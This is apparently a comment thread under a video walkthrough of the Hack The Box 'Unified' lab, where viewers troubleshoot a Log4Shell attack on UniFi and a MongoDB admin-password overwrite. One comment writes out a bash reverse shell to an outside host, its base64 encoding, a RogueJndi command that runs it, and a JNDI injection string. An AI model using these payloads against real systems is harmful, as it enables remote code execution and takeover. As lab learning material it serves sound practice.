In case anybody gets stuck towards the end like I did; the box is NOT broken, just me being a n00b 🤖
CyberGeek let me know that the reason I had problems with the admin panel UI towards the end was because the admin account has site preferences configured to use the old UI. When I created a new account, it was set to use the default (new) UI, missing some functionality and with buggy redirects.
What I *should* have done is update the password for the admin account, rather than creating a new user. So if you also run into problems at this stage, remember to update rather than insert 😉
Edit: Some people have had difficulties getting netcat to connect, Brianth identified a potential issue so hopefully this can help other people:
"there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal"
I thought it was pretty neat to try it both ways, so it was a good learning experience! Thanks again!
Sounds like just another buggy-ass box from HTB
@dumpydumpdump8869 😂
I see that many people ran into the netcat listener issue. The problem seems to be not only in the echo command but every time you use a space around a pipe. I had this issue when running the command for the ldap server, and removing the spaces every time I saw a pipe seems to take away the issue.
Yes, I confirmed the box is working and it's OK with the update of the admin password. I was stuck on this for 2h but it's not wasted, it gave me the opportunity to discover every mongo request. For netcat there is no issue for me, I think maybe that's because my reverse shell was captured from the log4j python script available on GitHub. The only thing I can add is that it's possible to complete the box without upgrading the shell, but thx for the script /dev/null you give.
Thx for your work, it's really good content and a way to learn
Back again, to give you props on another one. Was having issues with getting the reverse shell through the exploit. Thanks for walking us through it.
For sure going to be recommending your stuff man, super knowledgeable.
Thank you! 🥰
As a junior cybersec guy, thanks for your efforts, I learn a lot
That's the goal! 🔥
i dont know how you do it but you manage to calm me down while I'm getting frustrated with a box. Thank you so much for these
Awww great to hear! Thanks mate 💜
Thank you, this means so much to us, learners, I really struggled with this Box, Thanks a lot really appreciate your work
Awww thank you! Really appreciate the kind words 🥰
This was such a great box but honestly could not have done it without your help. Thanks for the awesome walkthrough.
These starting point boxes are definitely getting harder! Thanks mate 🥰
bruh added the data in the database, and he messed up with the add users in db question lmao, that was funny, thank you so much
Hi, great walkthrough, found the nudge for Burp really useful. I found out what the problem was with the UniFi settings screen not loading. As per the Sprocket Security blog, the "site" section for mongo privesc requires an entry for "super" as well as "default", and then the dashboard seems to load ok.
Awesome content🤘🏼🤘🏼
🥰🥰🥰
Namaste sir !
Love your work !
Thanks mate 🥰
thanks man, you are awesome!
🙏🥰
Amazing tutorial.. I wanted to tell something to lazy people like me.. We can skip the JNDI and burp suite part.. We just have to open metasploit and search for log4j.. And the exploit will give us the shell directly... I wish I was intelligent enough to solve the machine in right way like you did😓
ty and nice tip, metasploit is amazing tool! 🙂
you can explain for resolution with metasploit lol
I got stuck on the ncat listener got everything up to that point right and I use nc -nlvp 4444 and then hit send on the repeater and it goes through the process and still nothing is showing up on the ncat terminal that I got the shell. Not really sure where it is failing
Double check the PDF walkthrough as well, I think it uses a slightly different approach to me and is probably more verbose.
do you have the solution im stuck like you as well
@mr.blackbeard453 I have not yet. However, I have stepped away from trying again due to work and now holiday week. I am looking to pick back up this weekend, will have more time then
@FrankMaree There's a few potential solutions here if you didn't try already: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to - please update here if you find the solution, it will help others 🥰
@FrankMaree okay brother, fortunately I already done it, I tried again the same method and the reverse shell opened, I think it was because of a bad connection maybe
great video
tyty 💜
Tysm as always
🙏🥰
I do the same thing step by step, but while the reverse shell on netcat should occur, there is nothing, it's still just listening on the port :/
Hmm it should work 🤔 I would recommend double-checking the steps in the article/video or official walkthrough. There's also been some other users with similar issues who suggested how they resolved in the comments, e.g.
"I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal"
If you still aren't getting it after that, you'll get a lot more support on the HTB forum or discord.gg/hackthebox 😉
So far everything is going great, and your video has helped me get to where I am, but currently when I run the tcpdump, I get back everything as I should except it's showing the ip in place of the hostname. How would I go about making it show the hostname like in the video? I tried Google, but you get back too wide of an array of info from all the different keywords to find the answer easily.
Hmmm do you need the hostname? Make sure you aren't running tcpdump with the "-n" flag and that the hostname is in your /etc/hosts file.
@CryptoCat I don't think I necessarily need the hostname in this case, but I was curious how you made it come up like that. Another issue I have is that I can't get other web pages to load while I'm running the manual proxy setup for BurpSuite, forcing me to switch back and forth between manual and auto proxy settings to do things like find and copy the commands from Sprocket or put my answers in on HTB, which really hinders my speed. I do have it set to include https per the previous challenge and I assume it should be here too. You don't appear to need to change the proxy back and forth to browse, so how can I circumvent this issue?
Either use of "-n" flag or the hostname not being active in /etc/hosts would be my guess for the first part. For your second question, I use the FoxyProxy plugin which allows you to configure multiple profiles, e.g. I use one for burp and another for SSH-D forwarding 🙂
Am having trouble receiving a connection on my netcat listener on Unified on HTB? What might be the problem and the solution?
Hi mate, it's been a while since I did these labs. I would double check the steps in the video or the official PDF walkthrough and if you can't fix it, check out the hackthebox forum/discord 🙂
Awesome video but it got me thinking: This doesn't feel like a "Starting Point" box. For someone starting out, how are they ever going to know to do any of this?
I feel you! This one was tough, good practice for the OSCP "Try Harder" mindset though 😁
a little late but this machine is located towards the end on the very last tier of Starting Point. Up to this point you would've done at least 20 boxes and using what you've learned about enumeration, finding vulnerabilities, and privilege escalation it really isn't that complex of a machine compared to the ones you'll face outside of Starting Point.
dont put spaces inside curly{base64,-d}|{bash,-i}
I'm getting back the connection with nc but I'm not able to write anything. Example: I write whoami and it doesn't return anything. Any ideas?
Sounds like you are having the same problem described here: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to, have a look through those troubleshooting steps and see if it helps. If not you can check the steps in the official PDF walkthrough or HTB forum and if worst comes to worst (you don't solve it), ask for some support in discord.gg/hackthebox 😉
Hello sir, I've been stuck for this box for 3 days, I followed the writeups but I don't know the problem. My burpsuite is not sending feedback, JNDI not sending the payload, and netcat doesn't seem to listen
Oooft, this is a tough one for starting point! Does burp and netcat normally work for you OK? I would double check the steps in the video (and the comments, as others have resolved similar problems). If you don't get it, check in the #starting-point channel of discord.gg/hackthebox - there's lots of helpful people who'll be able to assist with troubleshooting 😉
@_CryptoCat Yes, normally nc and burp work fine but somehow they won't work on this box XD. Thank you sir
How do I install ssx??? By default ssx is not installed and I can't find this package or tool
"ssx" is just an alias (shortcut) i have setup to run "searchsploit - X". You can check my full list of bash aliases here: github.com/Crypto-Cat/CTF/blob/main/my_bash_aliases.md
@_CryptoCat thank you
I have an issue with getting my terminal up with nc. Essentially I can get the HTTP server started up and the LDAP server started up too, and when I send the payload off it registers so those two servers that it's been set off, but my netcat hasn't received anything yet. Is there anything I can do to fix this?
Not too sure the issue.. I would double check steps in video / official PDF walkthrough. If that fails, check the hackthebox discord and/or forum for support 😉
I found it that a script on msf seems to be available, but it got stuck on "Server stopped", and I didn't know how to move on lol
Oh cool, I didn't see the MSF exploit. Try manually like the video or official walkthrough if that's not working 😉
It says that it cannot access the jar file when i tried to create the server
java -jar target/RogueJndi-1.1.jar at 11:16 in the video he edits the path and removes the portion of the command that lists a directory he is already in. Remove that part and it will run.
i do exactly what you do but the nc doesnt get anything
It's difficult for me to troubleshoot remotely, I'd recommend double-checking the steps in the video and reviewing the official PDF walkthrough (maybe one of the steps will be clearer). If you still can't get the netcat connection, jump into the HTB discord or forums for support 🙂
I tried all things step by step but I can't get the netcat request back. LDAP and HTTP are running and get the request back, but the only problem is with netcat
Can get access.
Please give me any solution bro🥺
No need bro problem solve
Problem with 389 and 1389 capturing 😂😂
Mistakes in pdf
There is a new machine named Three on Starting Point, please help
ua-cam.com/video/sV9M4LKKT9s/v-deo.html 😉
Hello sir, I am getting an error while accessing the website. The error is "ssl_error_rx_record_too_long", is the error in Firefox or what
Hi mate, which part is this, the port 8443? Using "https" in URL?
@_CryptoCat sorry sir, when I watched your video again I understood what the error is: I was just connecting to the wrong port, I was trying to connect to port 8080
thanks for asking about the problem sir
@hva8055 No problem! 😊
Netcat doesn't seem to listen no matter how often I check my syntax, please help
When you say it doesn't listen.. What does it say? you are doing "nc -nlvp 1337"? Can you timestamp where you are stuck, can't remember the whole box very well xD
11:53 building the reverse shell with rogue-jndi
After typing that long syntax, the http and ldap server start but once I send my request again via burp suite after starting up netcat it just shows "listening on 0.0.0.0 4444"
@PPHY_GLND Did the Test JNDI:LDAP payload work for you @ 6:54? Double check the IPs and ports are correct.
@_CryptoCat you are awesome honestly. I didn't test 4444 first. Thanks so much for your time and patience
@PPHY_GLND No problem 🥰
Sir, i am not getting back connection of netcat
I think the local LDAP + HTTP server is not setup correctly. When I did the TryHackMe Solar (Log4J) I got the same output you sent me in screenshot on Twitter (0
1?id) before I setup the LDAP server. Double check you've followed all of the steps: www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
@_CryptoCat thanks sir
@_CryptoCat I have been stuck on this lab for hours and I am getting a similar issue.
Here is what I did (as per walkthrough and link)
echo 'bash -c bash -i >&/dev/tcp/10.10.10.10/4242 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg==
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.10.10"
${jndi:ldap://10.10.10.10:4242/o=tomcat}
Note that 10.10.10.10 is not my IP address just for the sake of this comment. It is the real one on my Kali :)
I made sure I was not getting any extra space in the base64 and even tried with echo -n (in case of a hidden
). However, didn't manage to solve it. Any idea ?
My netcat seems to get a communication but just showing the 0'? In the terminal :/
I am not getting a reverse shell back. I see the message in the rogue server when I execute the payload in burp. The message is ---(Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload) but I do not get any shell in netcat listener.
Hey, have a read through some of the comments because I remember other people mentioning similar issues. You could also double check the official PDF walkthrough, just to make sure nothing was missed.
no matter what i do i cannot get netcat to listen please help
Hmmm a lot of people seem to have the problem, I don't know what to suggest if you've followed all the same steps from the video 😕
Have you had problems getting NC shells on other boxes? Any AV/Firewall blocking?
I had the same problem and how I ended up here. Double and triple check all your command syntax. Everything from the base64 encryption to the ldap server command and your port on ncat and ldap are the same. I ended up accidentally leaving brackets in and a few other things.
I had the same problem, and I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal
@brianthlizama8278 Thanks, I'll pin that suggestion 🙂
it so sad they made this box for beginner WTF HTB
I hear this a lot! 😆
Please Help!
Secure Connection Failed
An error occurred during a connection to unified.htb:8080. SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG
Should be port 8443!
video is good but your accent is too hard to understand.
Awww sorry about that!
Great video. Has anyone faced a problem capturing a request via Burp Suite? And @CryptoCat, would using the command curl work? I tried, didn't work.
Yeh, using burp or curl should both work! You could also use the developer tools (f12) in chrome/firefox. Maybe there's a problem somewhere else, re-check your steps 😉
Ait cool. Thanks
Thanks for this Crypto! Really informative. The reason why you were not able to reveal the root password though was because you created an account which was not an administrator. Had you updated the existing administrator account you would have gotten that 'site' option and been able to see the password with `db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")}, {$set: { "x_shadow" : "$6$u72...`
Nice, thanks for the tip! 🥰